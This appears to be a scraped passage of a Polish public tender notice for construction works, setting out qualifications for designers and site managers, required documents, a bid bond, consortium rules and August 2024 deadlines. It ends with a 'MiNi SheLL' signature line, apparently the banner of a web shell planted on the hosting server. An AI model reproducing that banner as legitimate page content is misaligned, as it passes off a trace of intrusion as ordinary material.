konstrukcyjno-budowlanej, która posiada<br/>uprawnienia budowlane<br/>do projektowania bez ograniczeń w specjalności konstrukcyjno-budowlanej,<br/>(iv) co najmniej jedną osobę do pełnienia funkcji projektanta w specjalności sanitarnej, która posiada uprawnienia<br/>budowlane do projektowania<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i<br/>kanalizacyjnych bez ograniczeń,<br/>(v) co najmniej jedną osobę do pełnienia funkcji projektanta w specjalności elektrycznej, która posiada uprawnienia<br/>budowlane do projektowania bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>elektrycznych i elektroenergetycznych,<br/>(vi) co najmniej jedną osobę do pełnienia funkcji projektanta w specjalności inżynieryjnej drogowej, która posiada<br/>uprawnienia budowlane<br/>do projektowania w specjalności inżynieryjnej drogowej bez ograniczeń,<br/>(vii) każda z osób wskazanych w tiret (ii)-(v) powinna posiadać doświadczenie polegające na wykonaniu w ciągu ostatnich<br/>10 lat projektu<br/>w danej specjalności dotyczącego budowy budynku o powierzchni netto nie mniejszej niż 400 m2,<br/>(viii) Zamawiający dopuszcza możliwość łączenia funkcji kierownika zespołu projektowego z projektantem w specjalności<br/>architektonicznej lub konstrukcyjno-budowlanej, o ile osoba skierowana do prac spełnia warunki określone w obu punktach<br/>powyżej.<br/>c) Wykonawca dysponuje lub będzie dysponował i skieruje do realizacji zamówienia osoby o odpowiednich kwalifikacjach<br/>zawodowych, wykształceniu<br/>i doświadczeniu, niezbędnych do prawidłowej realizacji zamówienia (osoby tworzące kluczowy zespół do kierowania<br/>robotami budowlanymi), tj.:<br/>(i) jedną osobę do pełnienia funkcji kierownika budowy, która posiada uprawnienia budowlane do kierowania robotami<br/>budowlanymi bez ograniczeń w specjalności konstrukcyjno-budowlanej oraz była kierownikiem robót budowlanych<br/>polegających na budowie budynku o powierzchni netto nie mniejszej niż 400 m2<br/>(ii) jedną osobę do pełnienia funkcji kierownika robót sanitarnych, która posiada uprawnienia budowlane do kierowania<br/>robotami budowlanymi<br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i<br/>kanalizacyjnych bez ograniczeń,<br/>(iii) jedną osobę do pełnienia funkcji kierownika robót elektrycznych, która posiada uprawnienia budowlane do kierowania<br/>robotami budowlanymi bez ograniczeń w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i<br/>elektroenergetycznych,<br/>(iv) jedną osobę do pełnienia funkcji kierownika robót w zakresie instalacji teletechnicznych, p.poż i pozostałych<br/>niskoprądowych, posiadającą uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń<br/>telekomunikacyjnych bez ograniczeń,<br/>(v) jedną osobę do pełnienia funkcji kierownika robót drogowych, która posiada uprawnienia budowlane w specjalności<br/>inżynieryjnej drogowej bez ograniczeń posiadającą doświadczenie polegające na kierowaniu co najmniej 1 robotą<br/>budowlaną polegającą na wykonaniu parkingu o pojemności min. 10 samochodów osobowych;<br/>(vi) jedną osobę do pełnienia funkcji koordynatora architektury krajobrazu – posiadającą wykształcenie kierunkowe w<br/>zakresie architektury krajobrazu oraz doświadczenie polegające na realizacji co najmniej jednego zagospodarowania zieleni<br/>o powierzchni nie mniejszej niż 1 ha.<br/>(vii) Każda z osób wskazanych w tiret (ii)-(iv) powinna posiadać doświadczenie polegające na pełnieniu w ciągu ostatnich 10<br/>lat funkcji kierownika budowy (robót) w zakresie swojej specjalizacji przy realizacji co najmniej jednej inwestycji polegającej<br/>na budowie budynku o powierzchni netto nie mniejszej niż 400 m2;<br/>(viii) Zamawiający nie dopuszcza możliwości łączenia funkcji osób wskazanych w tiret (i)-(vi) <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: 2. Podmiotowe środki<br/>dowodowe składane na wezwanie Zamawiającego (podmiotowe środki dowodowe, jakie zobowiązany będzie złożyć Wykonawca,<br/>którego oferta zostanie najwyżej oceniona, lub Wykonawcy, których Zamawiający wezwie do złożenia wszystkich lub niektórych<br/>podmiotowych środków dowodowych w przypadkach, o których mowa w art. 274 ust. 2 ustawy Pzp):<br/>1) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ustawy Pzp w zakresie<br/>podstaw wykluczenia, o których mowa w art. 108 ust. 1 pkt 3, 4, 5 i 6 ustawy Pzp oraz na podstawie art. 7 ust. 1 ustawy z dnia 13<br/>kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego, (Dz.U. z 2022 r. poz. 835); Wzór oświadczenia stanowi Załącznik nr 4.2 do SWZ.<br/>2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w<br/>zakresie określonym w art. 109 ust 1 pkt 4 ustawy Pzp, wystawioną nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne<br/>przepisy wymagają wpisu do rejestru lub ewidencji;<br/>3) informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków<br/>finansowych lub zdolność kredytową wykonawcy w okresie nie wcześniejszym niż 3 miesiące przed jej złożeniem;<br/>4) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy – w tym okresie, wraz<br/>z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz<br/>załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa,<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli z<br/>uzasadnionej przyczyny<br/>o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty; Wzór wykazu<br/>stanowi Załącznik nr 4.4<br/>5) wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za<br/>świadczenie usług, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia<br/>niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o<br/>podstawie do dysponowania tymi osobami; Wzór wykazu stanowi Załącznik nr 4.5.<br/>6) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej w<br/>rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym<br/>Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo<br/>oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy<br/>należącego do tej samej grupy kapitałowej; Wzór oświadczenia stanowi Załącznik nr 4.6 do SWZ ,<br/>3. Jeżeli wykonawca podlega wykluczeniu ze względu na zajście okoliczności wskazanych w przepisach znajdujących zastosowanie<br/>w postępowaniu – wykonawca przedkłada dowody, wskazujące na spełnienie przesłanek określonych w art. 110 ust. 2 ustawy Pzp<br/>(samooczyszczenie)</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca składa wraz z ofertą:<br/>1) oświadczenie o braku podstaw do wykluczenia i spełnieniu warunków udziału<br/>w postępowaniu; Wzór oświadczenia stanowi Załącznik nr 4.1 do SWZ.<br/>2) w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia na zasadach określonych w art. 117 ustawy Pzp:<br/>a) oświadczenie o braku podstaw do wykluczenia i spełnieniu warunków udziału<br/>w postępowaniu składa każdy z Wykonawców wspólnie ubiegających się<br/>o zamówienie oddzielnie;<br/>b) oświadczenie składane na podstawie art. 117 ust.4 ustawy Pzp dotyczące usług, które wykonają poszczególni wykonawcy; Wzór<br/>oświadczenia stanowi Załącznik nr 4.3 do SWZ;<br/>3) jeżeli wykonawca polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby na zasadach<br/>określonych w art. 118 ustawy Pzp:<br/>a) w odniesieniu do tych podmiotów - oświadczenie takiego podmiotu o braku podstaw do wykluczenia i spełnianiu warunków<br/>udziału w postępowaniu; Wzór oświadczenia stanowi Załącznik nr 4.1 do SWZ;<br/>b) zobowiązanie podmiotu udostępniającego zasoby wykonawcy do oddania tych zasobów do dyspozycji, z którego będzie wynikać:<br/>(i) zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby;<br/>(ii) sposób i okres udostępnienia wykonawcy i wykorzystania przez niego zasobów podmiotu udostępniającego te zasoby przy<br/>wykonywaniu zamówienia;</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający żąda od Wykonawców wniesienia wadium w wysokości 40 000 PLN<br/>2. Wadium należy wnieść przed terminem składania ofert (w szczególności wadium<br/>w pieniądzu powinno znajdować się na rachunku zamawiającego przed upływem terminu składania ofert).<br/>3. Wykonawca wnosi wadium w jednej lub kilku następujących formach:<br/>1) pieniądz,<br/>2) gwarancja bankowa,<br/>3) gwarancja ubezpieczeniowa,<br/>4) poręczenie udzielane przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 roku o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019.poz.310 ze zm.)<br/>4. Wadium w pieniądzu należy wpłacić przelewem na rachunek 17 1010 1140 0197 3813 9142 0000 z wpisaniem na<br/>dowodzie wpłaty hasła: „Wadium na przetarg nr 01/2024/ZSCKR”. Koszty prowizji bankowych z tytułu wpłaty wadium ponosi<br/>Wykonawca.<br/>5. Wadium w formie gwarancji lub poręczenia należy przekazać w oryginale w postaci elektronicznej tj. dokument gwarancji<br/>lub poręczenia podpisany elektronicznym podpisem kwalifikowanym przez gwaranta lub poręczyciela.<br/>6. Gwarancje lub poręczenia muszą zobowiązywać gwaranta lub poręczyciela do zapłaty wadium na rzecz zamawiającego<br/>na jego pierwsze, pisemne wezwanie, muszą być nieodwołalne i ważne co najmniej przez okres związania ofertą. Wadium<br/>powinno zabezpieczać uprawnienia zamawiającego do zatrzymania wadium określone w art. 98 ust. 6 ustawy Pzp.<br/>7. Zwrot lub zatrzymanie wadium nastąpi zgodnie z przepisami art. 98 ustawy Pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> WYKONAWCY WYSTĘPUJĄCY WSPÓLNIE (KONSORCJUM):<br/>1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>2. Wykonawcy występujący wspólnie ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania ich w postępowaniu<br/>i zawarcia umowy w sprawie zamówienia publicznego. Treść pełnomocnictwa powinna dokładnie określać zakres<br/>umocowania. Dokument pełnomocnictwa powinien zostać podpisany przez wszystkich Wykonawców ubiegających się<br/>wspólnie o udzielenie zamówienia, w tym Wykonawcę pełnomocnika. Podpisy muszą być złożone przez osoby uprawnione<br/>do składania oświadczeń woli.<br/>3. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem. Oferta musi być podpisana w taki sposób, aby<br/>prawnie zobowiązywała wszystkich Wykonawców występujących wspólnie. Pełnomocnictwo winno być dołączone do oferty<br/>(w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym, w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym).<br/>4. Każdy z wykonawców występujących wspólnie (członek konsorcjum) nie może podlegać wykluczeniu z postępowania.<br/>Spełnienie warunków udziału w postępowaniu w stosunku do wykonawców występujących wspólnie będzie oceniane<br/>łącznie.<br/>5. W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie o spełnieniu warunków i braku<br/>podstaw do wykluczenia oraz podmiotowe środki dowodowe składa każdy z wykonawców wspólnie ubiegających się o<br/>zamówienie. Dokumenty te powinny potwierdzać brak podstaw wykluczenia oraz spełnianie warunków udziału w<br/>postępowaniu w zakresie, w którym każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>6. Wykonawcy, którzy złożyli ofertę wspólną przedłożą oświadczenie składane na podstawie art. 117 ust. 4 ustawy Pzp<br/>dotyczące usług, które wykonają poszczególni wykonawcy. Wzór oświadczenia stanowi Załącznik nr 4.3 do SWZ.<br/>7. Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie uznana za najkorzystniejszą, przed<br/>podpisaniem umowy w sprawie zamówienia publicznego, są zobowiązani przedstawić na żądanie Zamawiającego umowę<br/>regulującą ich współpracę.<br/>8. Wykonawcy, którzy złożyli ofertę wspólną odpowiadają solidarnie za realizację zamówienia.<br/>9. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli<br/>posiadanie przez Wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy<br/>w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zmiana Umowy<br/>1. Zamawiający przewiduje zmiany postanowień Umowy w następujących przypadkach i na warunkach określonych poniżej:<br/>1) zmiana terminu realizacji Umowy (w tym zarówno terminów wykonania Etapu I, jak i Etapu II) - jeśli konieczność ta<br/>nastąpiła na skutek okoliczności, których nie można było przewidzieć w chwili zawierania Umowy (np. siła wyższa), w<br/>szczególności: udokumentowanych<br/>w Dzienniku Budowy i uniemożliwiających kontynuowanie robót zgodnie ze sztuką budowlaną działań sił natury, które<br/>zostały uznane za stan klęski żywiołowej, przed którymi Wykonawca nie mógł w racjonalny sposób poczynić<br/>zabezpieczenia, a także opóźnień w uzyskaniu decyzji z właściwych organów;<br/>2) zmiana terminu realizacji Umowy w przypadku wystąpienia opóźnienia w dokonaniu określonych czynności lub ich<br/>zaniechania przez właściwe organy administracji państwowej, nie będących następstwem okoliczności, za które Wykonawca<br/>ponosi odpowiedzialność;<br/>3) zmiana terminu realizacji Umowy w przypadku wystąpienia opóźnienia w wydawaniu decyzji, zezwoleń, uzgodnień, itp.,<br/>do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres,<br/>przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności,<br/>za które Wykonawca ponosi odpowiedzialność;<br/>4) zmiana terminu realizacji Umowy, jeśli konieczność ta nastąpiła na skutek okoliczności leżących po stronie<br/>Zamawiającego;<br/>5) zmiana terminu realizacji Umowy w przypadku wystąpienia szkód oraz następstw nieszczęśliwych wypadków<br/>dotyczących pracowników i osób trzecich, a powstałych w związku z prowadzonymi Robotami, w tym także ruchem<br/>pojazdów mechanicznych na Terenie budowy;<br/>6) zmiana terminu przekazania Terenu budowy ze względu na przyczyny leżące po stronie Zamawiającego;<br/>7) możliwość wprowadzenia innych rozwiązań technologicznych usprawniających wykonanie Przedmiotu Umowy ze<br/>względów technicznych lub finansowych, w szczególności w sytuacji pojawienia się na rynku nowych rozwiązań<br/>technologicznych i materiałowych,<br/>8) zmiana zakresu rzeczowego Inwestycji wynikająca z okoliczności, których nie dało się przewidzieć, niezależnych od<br/>Zamawiającego lub Wykonawcy,<br/>9) zmiana wysokości wynagrodzenia należnego Wykonawcy, w przypadku:<br/>a) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację Umowy;<br/>b) w przypadku wystąpienia okoliczności wskazanych w pkt 7 lub 8, w przypadku gdy okoliczności te wpływają na wysokość<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>kosztów ponoszonych przez Wykonawcę; Wzrost wynagrodzenia Wykonawcy możliwy jest jedynie o wysokość<br/>uzasadnionych<br/>i udokumentowanych kosztów niezbędnych do prawidłowego wykonania Obiektu;<br/>10) zmniejszenia zakresu robót budowlanych w przypadku wystąpienia okoliczności powodujących, że:<br/>a) wykonanie części zakresu robót nie leży w interesie publicznym, czego nie można było przewidzieć w chwili zawierania<br/>Umowy lub<br/>b) wykonanie części zakresu robót nie jest możliwe, z przyczyn nieleżących po stronie Zamawiającego i Wykonawcy,<br/>- przy odpowiednim zmniejszeniu wynagrodzenia należnego Wykonawcy. W tych przypadkach wartość Robót<br/>zmniejszająca wysokość wynagrodzenia Wykonawcy zostanie określona na podstawie Harmonogramu rzeczowo finansowego oraz ustalenia zakresu wykonanych prac.<br/>2. Warunkiem wprowadzenia zmian Umowy, o których mowa w ust. 1 jest sporządzenie podpisanego przez Strony<br/>Protokołu konieczności określającego przyczyny zmiany oraz potwierdzającego wystąpienie (odpowiednio) co najmniej<br/>jednej okoliczności wymienionych<br/>w ust. 1. Protokół konieczności będzie załącznikiem do aneksu.<br/>3. Zmiany umowy mogą być dokonane również w przypadku zaistnienia okoliczności wskazanych<br/>w art. 455 ust. 1 ustawy Pzp.<br/>ciąg dalszy - WZÓR UMOWY <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-08-28 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-08-28 13:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-09-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com